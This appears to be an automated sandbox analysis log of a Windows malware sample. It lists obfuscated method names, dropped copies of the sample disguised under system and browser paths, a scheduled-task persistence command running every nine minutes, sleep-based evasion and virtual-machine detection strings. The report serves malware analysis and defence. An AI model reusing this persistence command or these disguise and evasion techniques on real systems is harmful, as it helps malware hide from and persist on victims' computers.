            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, QIp5ggsoemj4C6RCGW4.csHigh entropy of concatenated method names: '_7zt', 'zJWAfMIKPd', 'i9AAIfKcRf', 'ABbAEpBB6X', 'qrBAcEaTkY', 'JmcAUHFt2m', 'TAUAqbKbbO', 'Of94kTynoDdSKZ6muXE', 'y09PfCy5DhFZq1Md8RM', 'lAQs8dyGbdR9Vnkq59v'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, fAFL9dmJcW03lmQF6M.csHigh entropy of concatenated method names: 'Qh7vwShTn', 'CDar013Iw', 'g7WtSRZLh', 'qVwOLFP626KE3x1Tl4N', 'N5oFgAPOi4AeWX7Kr5q', 'LUw34LP4ClXsUy55iVd', 'eVPBubPoAqFJySLuItE', 'mWagFFPINTmLRYBS4H7', 'aZMM6XPHvU1Cld8gg4R', 'hTLWkgPjouVP2XR2oV3'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, IA85i92kH4a3IoGErw.csHigh entropy of concatenated method names: 'T43', 'YZ8', '_56i', 'G9C', 'CvFGteEgdcfp4OSbmRd', 'Egt73SEvMxUGt7dfn36', 'AjrdmtE30f1erpuJIqy', 'fniNTPEFPWUdGrjOwFX', 'zVFVivEKvuNKPfpvCvy', 'Rg2JHuE92YJHPV1YLBV'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, xl9TQQDKRpUJYjs70fW.csHigh entropy of concatenated method names: 'MsAkymYrAp', 'm5WkYkqerE', 'SEPkXH5L5D', 'WTjriw4IcwVrqVp2Juu', 'urVAir46sCo6toiml7g', 'uH3nXO4oU6L9gThbX0f', 'HbOchL4HStIgSXykIBk', 'o0qWnI4jeP9dmQtvxf0', 'IFmd2H4A5SpmHTevJeu', 'aekgRW4ReR32NAoHqiP'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, GJX08jxFEBcbTsRKlEy.csHigh entropy of concatenated method names: 'KXlODhMyTx', 'tPROucks12', 'QbXOvrlmwu', 'VLIOrIqdXJ', 'tcEOtuE0vH', 'VP3OPJ2Y4f', 'LKROwokqx1', 'OCgsFWFJahHq5D7BxjW', 'grgG8fFn0B75G9ZVnWn', 'TWP1L9F5N6ZLG4PCo38'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, pAkbYfZEpr9GVrHfYhW.csHigh entropy of concatenated method names: '_525', 'L97', '_3t2', 'UL2', '_6V2', '_968', 'BG5bxFnFO4MqlAtOZ3P', 'dSpHAonKh0RTSJu8QeX', 'gVjaJXn9MsAWAZCUOLi', 'CWShCynu477EA5x1ZmH'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, r9TS3xXxM2MYeFLfO7b.csHigh entropy of concatenated method names: 'gxE8aZhFSM', 'X1B8nQg7WO', '_8r1', 'py48pZSWxT', 'bnk81vw0Ro', 'ap58K8AK1P', 'NGT8AJhgG4', 'aKrXvNIuaPYsj3kg3kc', 'gZuM7aId8eJwFaIRgFP', 'iBY7gAIkpZwZlQ1jR3l'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, nEcnebTtSOPY5AtEUj.csHigh entropy of concatenated method names: '_52U', 'YZ8', 'M5A', 'G9C', 'U0l8mUxLl0p4dcSPJXF', 'tiu2Mfxw93TrmI820j7', 'rYALg7xqOecF8BBYq7Z', 'Q4gXbcxYxBH8bJUPvY5', 'ACfCKixt1kqADUlLCCL', 'Lc7Q7yxSqxWbXU6BKFp'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, AsxmUNxgB7Y4tOFsGpI.csHigh entropy of concatenated method names: 'qEG4j4fB6O', 'xXUC0HhUXXrwcYCf2hI', 'QloDCAh0DtjAnJaDQgL', 'IwtygwhsSP41UQ2D3hI', 'VHRk8PhrbZRjjscr4PD', 'MsCgssh7lkekhJ2NDyf', 'dIk4QZmmZh', 'pPL4fdFXd6', 'c7f4IUBNfZ', 'zRC4EID06P'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, rp3UVCO8iBTAaELsHU.csHigh entropy of concatenated method names: '_8Ok', 'YZ8', 'InF', 'G9C', 'LZORAQx9BC1Vo91AvPF', 'yQRA2bxurSffereCI1W', 'HVdu9Qxdck3jO87SLX8', 'XqFE5ZxkwBQHvR6sLYa', 'WwL4jXxhuWRN0vEMbrY', 'FthKpqxlD6nfM7L9smO'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, LKInObZ45OPM05GRMhI.csHigh entropy of concatenated method names: 'sg9', 'MnKoDSmR0c', 'KXNnSMoM21', 'ufvoX3xkD3', 'R6JVVvn0NHAy4fXAmpS', 'cAOu7GnsUxhf9664qHv', 'xtgpRHnUybcoS8po2wc', 'dkFGJeneP77M8kPx9Wp', 'hTh3F0nM4WN9yKnvHsI', 'GYD43Onra4teFUZmIBK'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, Y2CWIGxQCH7dOHmCRrc.csHigh entropy of concatenated method names: 'xjuRSVBuNV', 'Sd0RiEaKOA', 'wQ2RzxRb3X', 'VqbH5gG9Jh', 'PflHbQI6TZ', 'aimHmQAMf2', 'C9nHOGrKqj', 'YE0HRSlCeO', 'QrTHHdKdex', 'LpR5nUuwTiuZSjsPQ6p'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, gtXKCTsT4XBSbnH76Yb.csHigh entropy of concatenated method names: 'ICU', 'j9U', 'IBK', '_6qM', 'Amn', 'Mc2', 'og6', 'z6i', '_5G6', 'r11'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, TQ4W7aZ7XDjyl0M0vkc.csHigh entropy of concatenated method names: 'VlgaYdn3QG', 'PALaX2vVbP', 'tLuaBbtdNV', 'kSLR1wGeRU9vnAp4Vm8', 'bpseb8GMmdfaANKu4pV', 's518ZXG0WiBcpej8q2O', 'X6UKWvGsvyN5wdu6rMV', 'rnVpYTGUeqHvGUGnnr8', 'WwAGk4GrU5TWQhIFMBM', 'jOr17lG730oFfIYHlbu'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, KhKi4ndZV4QU2HwLavn.csHigh entropy of concatenated method names: 'R1x', 'YZ8', '_8U7', 'G9C', 'Qf5oBkcfUaxPUg66goo', 'V74uHmcNQdm0ZrmmDHs', 'ig3bvBciEGx3hTbREd0', 'W8uiM5cBMDBGra5yLdI', 'Kbh25Gc2SqDkdA575vx', 'k7NQVycCp6spI5HaeSF'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, uWT2crfteTXBrHq8GA.csHigh entropy of concatenated method names: 'sjneCclAh', 'ipqIwHBlsEaYTeQFBx', 'WMjFtnNIZp7gwl7O2x', 'LE6taYijSu0YQ0CoBG', 'w8lKIX2BujlITwOk2Z', 'eofFPhCboouhqVX5Ao', 'wVxmlvFek', 'qxPOPNC3t', 'db5R8Qcub', 'MijHJkoAj'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, YsA24Yd7geLmlYEVkXw.csHigh entropy of concatenated method names: '_981', 'YZ8', 'd52', 'G9C', 'lcousKV7wb52aQMIp46', 'uMZ36rVLaHxaKLwa2Cj', 'f3t38nVwjWLO4EUg8Ro', 'IEL2aIVqaHeMdiRTwnl', 'xqcB8HVYCxXyfgVcsTx', 'nNqrQjVtAKMh6jt17HI'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, D5Uplpxx5W1fOQNCr6S.csHigh entropy of concatenated method names: 'mSomy6pIBZ', 'B9ZmYacfor', 'BrTmXVEOd9', 'CZqmBF9gSx', 'zq0mTQMjQb', 'g10msCwOym', 'hkKRG53kFwedoshnU6u', 'W020qu3hNALOLYONqeU', 'G1uEjP3uj3J0M1eccoI', 'pn1IRk3dUxS6U7GNv9T'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, pZfICPDgYUq3NSZjAi6.csHigh entropy of concatenated method names: 'O4RjgjHrRn', 'hgCjdu0GWO', 'F8e', 'bLw', 'U96', '_71a', 'O52', 'LUtj2woq70', '_5f9', 'A6Y'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, EFgwVldQTGZNCZXMDoo.csHigh entropy of concatenated method names: 'GvP', 'YZ8', 'bp6', 'G9C', 'zqlsDiXOCIxB0GUC0PX', 'IC8gU8X4LCY41mg69aP', 'VLsXLbX60TUatrVZMgV', 'Wx0N9aXoqV594UgFK5O', 'I2bSGeXIGD1Eh5D9BRR', 'elDQXmXHtswxHx3aHty'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, Q1lxF4Z8vQSU9cfTIJV.csHigh entropy of concatenated method names: '_223', 'VW2C3tGkga9KtAJpvF2', 'iSBDTbGhaYwJCen8d3v', 'uolQJHGl9WN4iGCK0Pj', 'uHktImG1Lk2324FgZ41', 'E0FWJEGG6AJY3b9Mq3E', 'GKgvwtGps9hFgVaHEC9', 'PjRoJfGnBAnHcH4wMcs', 'JMVRYxG5TJ7LXfv4cSh', 'HOClu8GJPFsVIDvHiF1'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, h166EPdApj73RvAYgAv.csHigh entropy of concatenated method names: 'zHSmfF0XoN', 'G7JZghvcJ8oy0poS2sj', 'vDbcagvVpDBS0mWtfJU', 'LPFl77vD6AOwEp1NkQs', 'er8GmLvxPs0ubsGv46Y', 'vbBDDsvQim8DUIEA9ae', '_5q7', 'YZ8', '_6kf', 'G9C'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, vDKNB96O3ag3p63IqL.csHigh entropy of concatenated method names: 'pHw', 'YZ8', 'v2R', 'G9C', 'hliLggxT0mK5h46AOBs', 'bOHbS6xZ6AEgFVkEV9u', 'zlZbhOxfEWNgM16u2mu', 'gbKU7JxNCQm4aWj51O6', 'lOObM3xihYfkVIyN2LG', 'royuE2xBYMlN5jto9oW'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, Ri5qQaREX32lTyw2eG.csHigh entropy of concatenated method names: '_59M', 'YZ8', '_1zA', 'G9C', 'QKFT7lbOoWfHbRNNolv', 'Oss7bdb4L1r5flLsaXH', 'dlVj4Fb64xg0A5dBqvm', 'VLFA5ebotMmNq00S4Jw', 'Rkrqo2bIVv5gJ1wJoeZ', 'MlRLGqbHnb1ZaZw4T7W'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, NPiEhtypcJsgmsh3y5.csHigh entropy of concatenated method names: 'kcq', 'YZ8', '_4bQ', 'G9C', 'Bh6bOixciVAIOFnew3L', 'Pa9vDUxVLmkStkDe8v7', 'B3NTygxQQDcBJMakyIV', 'w47OswxXrGZQkP6v0p4', 'uH8Jfrx8Fsr8ddeL9rK', 'aoRjLpxgZbEdPcLF7lp'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, m8xxgBsArJkA9kgb2ob.csHigh entropy of concatenated method names: 'mrdojISvdI', 'gGio7n5G9q', 'NWyoePSoIf', 'lTVoFASKeu', 'iDFooNeOoL', 'jhUoN1iW2Q', 'Mq1o6yF5vD', 'q6hoGGFahE', 'g0KoQuf7rr', 'uxsofF98hg'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, toZDe4ddOXTXU6sWT30.csHigh entropy of concatenated method names: 'tO4', 'YZ8', '_4kf', 'G9C', 'dbdLKOclqfhi4d3OPph', 'PKyDWIc16BrmlxWnfrq', 'EYrvLTcGZSWAi47P2S0', 'QZPjgpcpjBQWwslQHrq', 'hBKgB1cnRql0dpXyQ3S', 'JQCPZZc56pmiNSUxJAy'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, WtvWuUsFZM7ZkGQMaaW.csHigh entropy of concatenated method names: 'uxk', 'q7W', '_327', '_958', '_4Oz', 'r6z', 'r7o', 'Z83', 'L5N', 'VTw'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, sY38QOXHeYrDnHKPQPW.csHigh entropy of concatenated method names: 'PJ1', 'jo3', 'xjd2np1iiN', 'cTA2p4kwRK', 'OSj21wmfOv', 'EC9', '_74a', '_8pl', '_27D', '_524'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, LyKhV9Zzu17Tu60Uy0a.csHigh entropy of concatenated method names: 'O2Ypg4TpZ5', 'QStpdNTGad', 'uHgp2XHj0w', 'iWfJQgJHWjnSRO2GrMN', 'uJoRZ7JjeikbSBse4Cl', 'iAgZojJo7LhHZ5GKFur', 'aYMQKGJIYSCWeqwpAPH', 'STrsVHJAK6kCq1pt0FW', 'mQJKIsJRppHnoVEWWaP', 'FcGH7vJeVAif0K7Wuji'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, lJsZfEdvrSPNC5yCBaG.csHigh entropy of concatenated method names: 'Ai7', 'YZ8', '_56U', 'G9C', 'orw3PbQSy7LpuyH6LrL', 'k9LOhaQzQdAkiC6tUdC', 'G3sTckXWmCJTVJFxigR', 'bInmtPXPOA0NnwAQr3v', 'tHx6O7XEEstYrX5vrQL', 'PQjbaJXbypgrEJQCQ7h'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, DSa7C9fSZlrcVpfbDvT.csHigh entropy of concatenated method names: 'SJXymQBBclshP', 't8qtqQe98u49uOXuy7S', 'FrJO2Geu5b07QHRG4jl', 'yxlwTLedHUKiyAwdrP1', 'kbmDltekpLefdk6QGyP', 'mw16v7ehynkvYAaKEw1', 'ylJRP5eFgXMWF9A3GBL', 'oVN1gveKc0mm4sGbucs', 'dG8bNbelFZVcyx7TMR6', 'svj9Xye1whPpYe4SaSb'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, Yx9MwxdFjkek32oq816.csHigh entropy of concatenated method names: '_3fO', 'YZ8', '_48A', 'G9C', 'BTscnxVVU06mNq8c0WF', 'Ijani7VQVdfq46CRSNn', 'fG4530VXRdqBqj3vgao', 'dmoXSYV8XQ0Z58eEHXK', 'Rle65DVgnnUN7EOqtbe', 'VDh9bYVv65aTk4Pl5gd'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, qLUmKCXQQmYrnTFKosa.csHigh entropy of concatenated method names: 'F9U7nBMqPt', 'KIl7p3GOJY', 'ncZ71sOMWS', '_3Gf', '_4XH', '_3mv', '_684', '_555', 'Z9E', 'ndm7KfQurU'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, PMGioSd3djNpJjdnymI.csHigh entropy of concatenated method names: 'rU3', 'YZ8', 'M54', 'G9C', 'UnF1NNVo1BIl2Lc747a', 'VbSsQKVIKDs0wXY4DfA', 'i3qQEPVHGvx86j2vJ6j', 'Hl5ynhVjBqtD0AGSRjy', 'mHsS3AVAdk6EDowIu5i', 'TVlnBCVR9rpGGos06Zx'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, r1udVSDBUOEUxUlSBNQ.csHigh entropy of concatenated method names: 'tPxjRfx6dU', 'LE2jHIp6j6', 'aOvjlfNIF9', 'RGfj4TrSj3', 'wWdjaefVyx', 'lZhjnrETcC', 'H58jp11s15', 'Olhj1hqI13', 'AqJjKQ93t9', 'uU4jApKAeX'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, DIF91NYDdmokIWoLsD.csHigh entropy of concatenated method names: '_3OK', 'YZ8', '_321', 'G9C', 'vlSSlgEtTOq6rgcj7EL', 'GZZnF7ESB3JZyZ3HcIp', 'wkRgo8Ez3vqj6RgkfCg', 'FBYxqpbW5roReDh20DV', 'PwXyuubPb5exQs1Fljq', 'b2r2W5bE9msAAQIopq8'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, nmTk31ZnUBArjI53DIF.csHigh entropy of concatenated method names: 'MQqaT5owk6', 'MqUasFI9T1', 'LHCaJ69NJc', 'oxwaWoyd33', 'Ic8axBF0YE', 'NTVxA6pcRlekCp5AVx2', 'EqELYApVImcluJuZL0v', 'hbCf0qpD6VQXWvZ4Cg8', 'jXBn4Kpx1yTvIoXwdOI', 'fM6uKRpQ8bnmPyafcYw'

            Persistence and Installation Behavior

            Source: C:\chainSurrogate\browsersvc.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exe | File written: C:\Program Files (x86)\Internet Explorer\images\UAhpvIJrmb.exe
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | File created: C:\chainSurrogate\browsersvc.exe
            Source: C:\chainSurrogate\browsersvc.exe | File created: C:\Windows\L2Schemas\OfficeClickToRun.exe
            Source: C:\chainSurrogate\browsersvc.exe | File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\default_apps\UAhpvIJrmb.exe
            Source: C:\chainSurrogate\browsersvc.exe | File created: C:\Program Files (x86)\Internet Explorer\images\UAhpvIJrmb.exe
            Source: C:\chainSurrogate\browsersvc.exe | File created: C:\chainSurrogate\UAhpvIJrmb.exe
            Source: C:\chainSurrogate\browsersvc.exe | File created: C:\Recovery\RuntimeBroker.exe
            Source: C:\chainSurrogate\browsersvc.exe | File created: C:\Recovery\UAhpvIJrmb.exe
            Source: C:\chainSurrogate\browsersvc.exe | File created: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe
            Source: C:\chainSurrogate\browsersvc.exe | File created: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\th\UAhpvIJrmb.exe
            Source: C:\chainSurrogate\browsersvc.exe | File created: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\dllhost.exe

            Boot Survival

            Source: C:\chainSurrogate\browsersvc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\windows nt\UAhpvIJrmb.exe'" /f
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exe | Memory allocated: 1540000 memory reserve | memory write watch
            Source: C:\chainSurrogate\browsersvc.exe | Memory allocated: 1AF60000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe | Memory allocated: 1540000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe | Memory allocated: 1B0D0000 memory reserve | memory write watch
            Source: C:\chainSurrogate\browsersvc.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe | Thread delayed: delay time: 600000
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe | Thread delayed: delay time: 599891
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe | Thread delayed: delay time: 599766
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
            Source: C:\chainSurrogate\browsersvc.exe | Window / User API: threadDelayed 1202
            Source: C:\chainSurrogate\browsersvc.exe | Window / User API: threadDelayed 961
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe | Window / User API: threadDelayed 1046
            Source: C:\chainSurrogate\browsersvc.exe TID: 4948 | Thread sleep count: 1202 > 30
            Source: C:\chainSurrogate\browsersvc.exe TID: 4948 | Thread sleep count: 961 > 30
            Source: C:\chainSurrogate\browsersvc.exe TID: 1060 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe TID: 7124 | Thread sleep count: 1046 > 30
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe TID: 7428 | Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe TID: 7428 | Thread sleep time: -600000s >= -30000s
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe TID: 1696 | Thread sleep count: 189 > 30
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe TID: 7428 | Thread sleep time: -599891s >= -30000s
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe TID: 7428 | Thread sleep time: -599766s >= -30000s
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe TID: 2756 | Thread sleep time: -30000s >= -30000s
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe TID: 984 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
            Source: C:\chainSurrogate\browsersvc.exe | File Volume queried: C:\ FullSizeInformation
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe | File Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Code function: 0_2_009FA5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 0_2_009FA5F4
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Code function: 0_2_00A0B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 0_2_00A0B8E0
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Code function: 0_2_00A0DD72 VirtualQuery,GetSystemInfo, 0_2_00A0DD72
            Source: browsersvc.exe, 00000004.00000002.1771032686.000000000314B000.00000004.00000800.00020000.00000000.sdmp, browsersvc.exe, 00000004.00000002.1771032686.0000000003118000.00000004.00000800.00020000.00000000.sdmp, 1b42ae2595212a1.4.dr | Binary or memory string: xJOThrWTc5CoXqajFGuc5AOJRFt4Ts5GoL3w8kI8s6ak1fLnaiqEZpXw5EBc7bAu959Lwolf8vu9jnSw4GeuB1q8yG14iqBQ5ql5g90w7LGn5YNRvPi07QsIOAXqwr6SudD3CXP4Psw0vDDZ3jISHKTp7dqgmK9QOx2cVUPYAnlOd2WL77wNinKjJY5iqtSEtgl7KkEjUtSejFMFGfjoYwrknTS6YqrQVgf6QZAW3N3yUqAELzcLKnq7yAU1RHKnCCICkPyqeMuK33P7SOvjOfGrziIPFIEvCPwSh7e6Avr73fD5vWjDWl
            Source: wscript.exe, 00000001.00000003.1743796050.00000000026DB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: wscript.exe, 00000001.00000003.1743796050.00000000026DB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\feW
            Source: browsersvc.exe, 00000004.00000002.1774357703.000000001BF16000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\e
            Source: browsersvc.exe, 00000004.00000002.1775639585.000000001C250000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: UAhpvIJrmb.exe, 00000023.00000002.1788521774.000000001C1A0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll,
